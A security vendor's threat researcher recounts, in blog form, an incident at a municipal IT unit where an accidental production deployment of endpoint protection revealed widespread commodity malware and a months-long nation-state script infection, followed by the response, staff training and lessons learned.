As a threat researcher, I’ve advised security teams of organizations big and small, across both public and private sectors. So after a decade in DFIR, people often ask me about the craziest or most interesting things I’ve seen on client networks. I have quite a few interesting stories under my belt, from state and local governments, to start ups, and large enterprises. I’m excited to share a few of these ‘Tales from the SOC’ with the larger cybersecurity community.
First up? The municipality.
Sometimes a customer is so enthusiastic about using a new technology that they jump in with both feet – often with interesting results. Case in point: a municipality that inadvertently deployed a brand-new endpoint protection technology across a small part of their production network.
Like most municipalities, this one had a wide variety of unusual and questionable software products running on endpoints in their environment. And while I wasn’t surprised to see the usual cast of characters – such as Emotet, TrickBot and an impressive spectrum of browser-resident malware – we also found an infection that stood out, and which we associated with a nation-state threat group.
What made this case even more interesting is that it happened in an obscure and relatively unknown IT group that is part of a sprawling municipality. Despite their low profile, the group is entrusted with a great deal of responsibility and was ultimately the target of a nation-state attack that went undetected for six months.
Their network includes hundreds of thousands of endpoints. Without any prior notice, they deployed an entirely new platform across a subset of a thousand production systems. Yes, the actual live environment that they use every day. Normally, analysts perform tests on lab networks with virtual machines, but this was the real deal.
The lead at the municipality was probably a little too eager to see what else technology could in protecting their network. He set up an automated installation job by mistake. By the time he realized what had happened, he decided to keep the software on those thousand or so systems and see what could be learned from it.
Our challenge: immediate threat response
Enthusiasm can be a blessing or a curse, depending on your perspective. To me it was a little of both – a great opportunity to showcase practical applications under the least convenient circumstances. If there were any margin for error before, it was gone. It was probably one of the biggest challenges faced in a customer trial. Teams responsible for threat detection are probably familiar with that moment when only a few seconds pass and somehow everything in front of them has changed.
As veterans of incident response and security operations, the team and I stepped into familiar and comfortable roles as we escalated things to our customer. They authorized the team to dig, and we took advantage of the technology already in place to begin our excavation and share findings.
Of course, once these systems were activated, we started receiving telemetry from them in our SOC which included all manner of events. They approached the configuration of the sensor with as much enthusiasm as they used in deploying it, and turned on every feature in prevention mode. Typically, we tune the platform for each SOC’s environment for a few days, but in this case our first notice was an unusual variety and volume of alerts.
We quickly realized that we were looking at a production environment because these alerts were showing things that normally aren’t on test systems or in lab simulations, such as complex and legitimate administrative tasks related to software management, multiple browser toolbars with adware, freeware screensavers, and other indications of patterns of behavior that appeared to be actual human beings on production systems.
From this early deployment, we immediately found more than 100 systems containing malware, or around 14 percent of the total population. Although most of the threats we found were best described as nuisances, and a small number of which could self-propagate to create a more costly cleanup effort, none of these types of threats were new or terribly novel. This discovery was somewhat of a surprise to the IT staffers, because they had been using a traditional AV solution for many years and never received any notification of these issues previously.
But not everything that we found could be easily addressed by antivirus software; most notably the state-sponsored sample which we confirmed had gone undetected on one endpoint for several months. This increased the pressure on everyone because we had a persistently-infected system in the enterprise for some time before we could deploy technology and have real-time visibility. We also had a series of investigative questions to answer with only a very small percentage of the production deployment complete. We have all read about various intrusions in the news, and we couldn’t help but think of the headlines. The customer needed us to move fast, collect and preserve evidence, and to help them understand whether this was just the tip of the incident iceberg.
Understanding Windows scripting attacks
We found the persistence mechanism for a script that would run periodically as a scheduled task – something we quickly confirmed wasn’t currently running. Scripts are a challenge for signature- or classifier-based solutions because they are incredibly malleable and because much of their behavior mimics a legitimate Windows user and software. An adversary can create thousands of unique variations of a script without losing any functionality, and many free obfuscation tools are available. For these reasons it is quite easy to evade a signature or perturb a machine-learning model.
Traditional enterprise AV solutions definitely have their place, and signatures can be effective against both classes of threats and certain malicious tools that are still widely used but rarely change. This threat was familiar to me – not only had I investigated the technique many times and developed dozens of analytics for its variations – I had even used the technique myself, many times.
On its own, you might see these techniques being used by threat actors with all degrees of maturity and motivations. This specific payload, however, had been previously described in public reporting on Russian nation-state activity – and that detail gave us pause.
The reasons for targeting this organization and this business unit weren’t obvious to us, noting that we couldn’t find any information about its responsibilities or personnel in open sources. We do know that these payloads are rarely, if ever, installed accidentally.
All of the systems compromised by this attack were in a business unit that was very much under the radar: it doesn’t have a public webpage, it isn’t well known to the outside public, and you can’t easily find their employees on LinkedIn. The unit is a small group of internal auditors buried within the overall IT infrastructure, making them an interesting target.
Being a municipal organization, we also found issues with non-PC endpoints, too. This customer runs utilities equipment in addition to the usual Windows PCs, creating a complex management infrastructure.
How we responded
Given the results of the initial deployment, one of our jobs was to train the customer’s IT staff to understand what they were seeing, how we came to our conclusions, and how to identify future compromises to their systems. Importantly, teaching customers how to identify the history and motivations behind an attack before remediation action is taken allows them to preserve evidence and focus their defenses to improve future protections.
We were able to train the customer to triage their alerts and understand the severity of various attacker techniques. One of the things that I should mention is that this customer’s total security staff was very small, with just a dozen people responsible for various tasks, despite operating within an IT department with hundreds of staffers. This security staff was supplemented with a number of third-party contractors and partners. That meant we had to ensure the team was fully educated on what to look for to detect threats most effectively. Part of the issue in this kind of deployment is that often the staff doesn’t know the right questions to ask to be able to understand if they have been compromised or not. Sometimes it takes years before they can be fully self-sufficient. It’s important to implement platforms that minimize the learning curve so that less skilled analysts are set up for immediate success.
Even though we started out with a surprise production deployment, we still ended up with a successful engagement and the customer came out looking like a hero, since they now know how to protect their systems against future attacks and what to look for in future scans.
Here are some of the lessons learned from this deployment:
• Never assume that when you find an alert that it is the first or even only event on that endpoint; you have to dig deeper to get the full picture.
• Training is essential: finding malware is just the first step and understanding how to find future malware is even more important.
• If you are going to evaluate a security solution using virtual machines or other simulated environments, understand that you will still have a very different endpoint population than your actual environment.
• Size doesn’t matter. No matter how big or small your IT team may be, or the overall business revenues, you have to be prepared for a breach. While the big companies like Target and Marriott get the headlines, those same adversaries can be found in even unlikely places such as at this small department within a municipal IT organization.